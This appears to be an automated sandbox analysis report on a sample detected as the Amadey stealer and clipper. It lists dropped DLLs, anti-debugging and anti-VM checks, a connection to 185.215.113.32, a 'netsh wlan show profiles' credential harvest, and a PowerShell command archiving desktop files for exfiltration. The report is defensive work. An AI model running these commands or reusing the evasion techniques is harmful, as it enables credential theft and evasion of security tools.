Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7936	Thread sleep time: -44022s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7928	Thread sleep count: 1123 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7928	Thread sleep time: -2247123s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7932	Thread sleep count: 1032 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7932	Thread sleep time: -2065032s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7892	Thread sleep count: 287 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7892	Thread sleep time: -8610000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 8008	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7920	Thread sleep count: 1032 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7920	Thread sleep time: -2065032s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7920	Thread sleep count: 1008 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7920	Thread sleep time: -2017008s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2008	Thread sleep count: 9994 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2008	Thread sleep time: -9994000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7316	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\wIaKimJFke.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 10_2_6E22BA2F FindFirstFileExW,_free,FindNextFileW,_free,FindClose,_free,

10_2_6E22BA2F

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\OneDrive\desktop.ini	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\Videos\desktop.ini	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\Music\desktop.ini	Jump to behavior

Source: explorgu.exe, explorgu.exe, 00000005.00000002.2869479107.000000000048F000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: rundll32.exe, 00000007.00000002.2064247735.0000029F08E60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorgu.exe, 00000005.00000002.2870677611.00000000010F5000.00000004.00000020.00020000.00000000.sdmp, explorgu.exe, 00000005.00000002.2870677611.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2064247735.0000029F08E72000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2869541490.000000000332A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2869541490.0000000003389000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wIaKimJFke.exe, 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmp, explorgu.exe, 00000001.00000002.1694186183.000000000048F000.00000040.00000001.01000000.00000007.sdmp, explorgu.exe, 00000005.00000002.2869479107.000000000048F000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: rundll32.exe, 00000007.00000002.2064247735.0000029F08DB8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: explorgu.exe, 00000005.00000002.2870677611.00000000010F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW#
Source: netsh.exe, 00000008.00000003.1991253555.0000028334A06000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\wIaKimJFke.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\wIaKimJFke.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\wIaKimJFke.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Thread information set: HideFromDebugger	Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\wIaKimJFke.exe

Code function: 0_2_04ED0CC7 Start: 04ED0CDA End: 04ED0CDE

0_2_04ED0CC7

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\wIaKimJFke.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process queried: DebugPort	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\wIaKimJFke.exe

Code function: 0_2_04ED0C6D rdtsc

0_2_04ED0C6D

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 10_2_6E226871 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

10_2_6E226871

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\wIaKimJFke.exe	Code function: 0_2_00515E8B mov eax, dword ptr fs:[00000030h]	0_2_00515E8B
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Code function: 0_2_00519B02 mov eax, dword ptr fs:[00000030h]	0_2_00519B02
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Code function: 5_2_002D5E8B mov eax, dword ptr fs:[00000030h]	5_2_002D5E8B
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Code function: 5_2_002D9B02 mov eax, dword ptr fs:[00000030h]	5_2_002D9B02
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_6E229EDF mov eax, dword ptr fs:[00000030h]	10_2_6E229EDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_6E22B511 mov eax, dword ptr fs:[00000030h]	10_2_6E22B511

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 10_2_6E22CEA4 GetProcessHeap,

10_2_6E22CEA4

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_6E226871 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_6E226871
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_6E2294D4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_6E2294D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_6E22610D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_6E22610D

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 185.215.113.32 80

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Main	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal	Jump to behavior

Source: explorgu.exe, explorgu.exe, 00000005.00000002.2869479107.000000000048F000.00000040.00000001.01000000.00000007.sdmp

Binary or memory string: Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\wIaKimJFke.exe

Code function: 0_2_004FCD47 cpuid

0_2_004FCD47

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\AIXACVYBSB.docx VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\AIXACVYBSB.xlsx VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\DTBZGIOOSO.docx VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\KATAXZVCPS.xlsx VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\NHPKIZUUSG.docx VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\VLZDGUKUTZ.xlsx VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\XZXHAVGRAG.xlsx VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\wIaKimJFke.exe

Code function: 0_2_004FC54A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

0_2_004FC54A

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe

Code function: 5_2_002A55B0 LookupAccountNameA,

5_2_002A55B0

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\rundll32.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

Stealing of Sensitive Information

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: 10.2.rundll32.exe.6e220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, type: DROPPED

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 10.2.rundll32.exe.6e220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIaKimJFke.exe.4e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.explorgu.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.explorgu.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1627718624.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2869343241.00000000002A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1694112022.00000000002A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1653832811.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
